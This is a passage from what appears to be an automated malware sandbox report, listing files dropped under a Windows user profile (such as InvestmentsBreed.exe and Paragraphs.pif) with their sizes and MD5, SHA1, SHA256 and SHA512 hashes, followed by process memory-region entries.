      423ee3de527bded616b2207e5ee5c9f3

      SHA1

      53e7ffb5dcb7381d1604c23fbbd8bc94b8186fa2

      SHA256

      fbf348f07b7afe0c17ba4d6ef93fe41c704170a7bd411fb23110551419dd0b19

      SHA512

      c57a22de0ca3e7ca688c2e1c0eba611108a107d6d76d511ed81dc1fbccff2bb39f96b36b6d2562fed10c932e500e01e749dbf763b3bd4b790b455430ed4fdb27

    • C:\Users\Admin\AppData\Local\Temp\Twin

      Filesize

      132KB

      MD5

      24501aeee6cb403383f8f21a7ebbb0fb

      SHA1

      9a3d1e97265239da15510d65b3ecb44ad90db8ee

      SHA256

      11ff42c7ad4d9c20c371314625244b5f866a342b5f35652ef2ea13f1666d5f54

      SHA512

      a61cd833cdad6d2c3007dd8b82fde1e14d76706598b1d13c79cd7122488dfd77dd9bbd976e2e112594d0d10b5068fc150c9af2f9acc62b10d23da4087c401487

    • C:\Users\Admin\AppData\Local\Temp\Various

      Filesize

      42KB

      MD5

      bca7eeaf06adbb89de8f20c5752637f9

      SHA1

      3edf6f51c20ff03e3d2bb1511ebe873ba4989544

      SHA256

      e051496f0a0d792aaeb0e9c13a715e6becc3e6975ee41f5792490974ce00e742

      SHA512

      d04e7b2aaa75921541461b6a840dce57a2ba4b45a0f6b1309d946fc284285c1e7d727b44feb6e4ada4e72bc3dbb7c9e6fb990588ed754f4fa82b903650d0ce65

    • C:\Users\Admin\AppData\Local\Temp\Wiki

      Filesize

      24KB

      MD5

      9fa2ad98c1fd8d18075688fa110dbe03

      SHA1

      a45f7fd031186e0e7993f029d205a1c0e85c1991

      SHA256

      547842e29b95762fab41b7a9c4fa2ab69bcc0fdc685f9b3d188200534e197eff

      SHA512

      c56194af641b29ff69e923195bc01e8d97971b4b7479e40af0dbf03bffcc307e7d25b4cc43c67f2819b395ec63916abcbd978c2de613ef71bc032c3c2053abdd

    • C:\Users\Admin\AppData\Roaming\InvestmentsBreed.exe

      Filesize

      1.6MB

      MD5

      93ca970bf446580ce800feb9c3973304

      SHA1

      c442d46a3bf7abe905f854d2ef5a8bd1ffcef2a8

      SHA256

      2aa321a93bfa09139831e510e3cf9a869ece3d2e00889c846be169963cbb3b34

      SHA512

      620213b690cca096a9deb426ab8193394cbb7eaadcbc6c8ead570354f7f265013cac11c8491a2f362c124f643ac0b318161c96c00f0292b0f6bf9426537a0450

    • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

      Filesize

      7KB

      MD5

      14c227dee804d5be52855f3190cd5c7b

      SHA1

      73a928b0b4c81723454ef6ee9e84c647408a23e4

      SHA256

      eca20bbb7e6f8de4ffe2b2975de379bd0386f70ca428d373a6694d5b20886969

      SHA512

      35669c3f15a980940526eebba65233d7174192618cd86f485842be155ca779337c34a126cb781bf98c1df81231af3af3e7556df63a8d6ffecf7efbafb47707a5

    • C:\Users\Admin\AppData\Roaming\config.txt

      Filesize

      714B

      MD5

      f8fe7a5d83d02eff92b01481be2b4c12

      SHA1

      cd4dae414016ec38b1d04353535cbfb26767212e

      SHA256

      57ea78b45ddd6624327818c76dc1c1cd3fa71ab8952eb710732899e5d5bb8fa3

      SHA512

      f98b3de003771a8885a533d25f16c4574e37c2a12d2529ccfd3bbbde3ad870cbb87024e36580c5bdf8ec10bf6ccaa51f63aba9a47e39d66d9f42a87c90ea330e

    • \Users\Admin\AppData\Local\Temp\83263\Paragraphs.pif

      Filesize

      990KB

      MD5

      7e778aecb67efac6252d3664087209e3

      SHA1

      e710316dae046e32f9011cabd2b68342a0d02626

      SHA256

      e528c2a6706b5ad536c7d5b745fbb037ae5ed197df4d687321eeb119c60007b3

      SHA512

      b459f0dd30d70eadadf79e52dfa97e186fb9a679d37c5c03cde23671fe28b987a8505e519b7586893c6b8728365f295c2aaf98794013301c2cc907feb349d65e

    • memory/1884-55-0x000000001B660000-0x000000001B942000-memory.dmp

      Filesize

      2.9MB

    • memory/1884-56-0x00000000021E0000-0x00000000021E8000-memory.dmp

      Filesize

      32KB

    • memory/2640-354-0x00000000004F0000-0x00000000005D9000-memory.dmp

      Filesize

      932KB

    • memory/2640-355-0x00000000004F0000-0x00000000005D9000-memory.dmp

      Filesize

      932KB

    • memory/2640-357-0x00000000004F0000-0x00000000005D9000-memory.dmp

      Filesize

      932KB

    • memory/2888-46-0x000007FEF5140000-0x000007FEF5ADD000-memory.dmp

      Filesize

      9.6MB

    • memory/2888-45-0x000007FEF5140000-0x000007FEF5ADD000-memory.dmp

      Filesize

      9.6MB

    • memory/2888-44-0x000007FEF5140000-0x000007FEF5ADD000-memory.dmp

      Filesize

      9.6MB

    • memory/2888-48-0x000007FEF5140000-0x000007FEF5ADD000-memory.dmp

      Filesize

      9.6MB

    • memory/2888-43-0x000007FEF5140000-0x000007FEF5ADD000-memory.dmp

      Filesize

      9.6MB

    • memory/2888-47-0x000007FEF5140000-0x000007FEF5ADD000-memory.dmp

      Filesize

      9.6MB

    • memory/2888-42-0x0000000002960000-0x0000000002968000-memory.dmp

      Filesize

      32KB

    • memory/2888-40-0x000007FEF53FE000-0x000007FEF53FF000-memory.dmp

      Filesize

      4KB

    • memory/2888-41-0x000000001B660000-0x000000001B942000-memory.dmp

      Filesize

      2.9MB